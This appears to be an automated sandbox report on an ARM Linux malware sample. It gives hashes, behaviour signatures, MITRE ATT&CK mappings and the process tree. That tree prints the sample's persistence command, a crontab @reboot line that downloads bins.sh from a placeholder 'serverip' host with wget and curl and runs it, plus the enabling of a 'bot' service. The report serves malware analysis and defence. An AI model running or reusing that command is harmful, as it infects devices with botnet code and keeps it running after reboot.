Overview

overview

7

Static

static

1

ba3f176f6f...0a.elf

debian-9-armhf

7

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    11/10/2024, 02:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf

  • Size

    76KB

  • MD5

    0bbc673a23d323061c36a37fe5c3d509

  • SHA1

    38f0a56d732c509f9bfb51d5fe6002619f6a6c7a

  • SHA256

    ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a

  • SHA512

    1037513661209ed70d9932ef8479b1b59850d215c5c1105f93212f7961441739860b887c8ad94c085912dcaed2cd0e9ecb3c8a0b21baf8f7b975546dbc6722a8

  • SSDEEP

    1536:lxu6Nt3LUDmK+Y104tBrDu/XyYp41N/DAzdLvNs/:lk6N9LUxtB3UZp4n8tNs/

Score
7/10
defense_evasiondiscoveryexecutionpersistenceprivilege_escalatioprivilege_escalation

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

    persistenceprivilege_escalationdefense_evasion
  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Modifies systemd 2 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

    persistenceprivilege_escalation
  • Modifies Bash startup script 2 TTPs 1 IoCs
    persistence
  • Changes its process name 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

    discovery
  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 1 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery

Processes

  • /tmp/ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf
    /tmp/ba3f176f6f168a4ef496592e1243c78dcaea1422a9d89d75e3b11d0c45fd290a.elf
    1⤵
    • Modifies Watchdog functionality
    • Creates/modifies environment variables
    • Enumerates active TCP sockets
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads system network configuration
    PID:648
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:657
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:659
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:660
      • /bin/chmod
        chmod +x bins.sh
        3⤵
        • File and Directory Permissions Modification
        PID:663
      • /bin/sh
        sh bins.sh
        3⤵
          PID:665
        • /bin/curl
          /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          3⤵
          • System Network Configuration Discovery
          PID:667
        • /bin/chmod
          chmod +x bins.sh
          3⤵
          • File and Directory Permissions Modification
          PID:668
        • /bin/sh
          sh bins.sh
          3⤵
            PID:658
        • /bin/sh
          sh -c "/bin/systemctl enable bot"
          2⤵
            PID:673
            • /bin/systemctl
              /bin/systemctl enable bot
              3⤵
              • Enumerates kernel/hardware configuration
              • Reads runtime system information
              PID:674

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Scheduled Task/Job

        1
        T1053

        Cron

        1
        T1053.003

        Persistence

        Boot or Logon Autostart Execution

        2
        T1547

        XDG Autostart Entries

        1
        T1547.013

        Create or Modify System Process

        1
        T1543

        Systemd Service

        1
        T1543.002

        Event Triggered Execution

        1
        T1546

        Unix Shell Configuration Modification

        1
        T1546.004

        Hijack Execution Flow

        1
        T1574

        Path Interception by PATH Environment Variable

        1
        T1574.007

        Scheduled Task/Job

        1
        T1053

        Cron

        1
        T1053.003

        Privilege Escalation

        Boot or Logon Autostart Execution

        2
        T1547

        XDG Autostart Entries

        1
        T1547.013

        Create or Modify System Process

        1
        T1543

        Systemd Service

        1
        T1543.002

        Event Triggered Execution

        1
        T1546

        Unix Shell Configuration Modification

        1
        T1546.004

        Hijack Execution Flow

        1
        T1574

        Path Interception by PATH Environment Variable

        1
        T1574.007

        Scheduled Task/Job

        1
        T1053

        Cron

        1
        T1053.003

        Defense Evasion

        File and Directory Permissions Modification

        1
        T1222

        Linux and Mac File and Directory Permissions Modification

        1
        T1222.002

        Hijack Execution Flow

        1
        T1574

        Path Interception by PATH Environment Variable

        1
        T1574.007

        Impair Defenses

        1
        T1562

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        System Network Configuration Discovery

        2
        T1016

        Internet Connection Discovery

        1
        T1016.001

        System Network Connections Discovery

        1
        T1049

        Lateral Movement

        Collection

        Command and Control

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /lib/systemd/system/bot.service
          Filesize

          356B

          MD5

          f03c70cd4c61a1852f9e19b8fb0d639c

          SHA1

          a6c078ffffdf05c4c47b273b24e6b3ff4ef7e008

          SHA256

          ae50a3052a395987a2779deb9253d4aa8638f2f8b1cda7df9039388f21be7a90

          SHA512

          6277fbbffcdd72fc3712721525538ac07fc46d290ebb02be34cef52b3e62bfa8a66f4e834d364d220108c815192e391ad986f05662fcbfae674417507f4bcc20

          Download Submit

        • /var/spool/cron/crontabs/tmp.ikoZ1g
          Filesize

          235B

          MD5

          f66259049e77e016213c05613e7bd249

          SHA1

          8cfa3c99058059df6e1b461d9a72562562da8436

          SHA256

          606f9c8cab193f4bf6275e55242ec7b1b33f0d3097ca110d232fffa7ba3edde9

          SHA512

          8a86630ac05b222c203abcc6eae50cabbde9ca31121301df15140b8e77cfb5e088249dc3810430c257cb410ea630c26faa72ef199760db076506cdd04d86018a

          Download Submit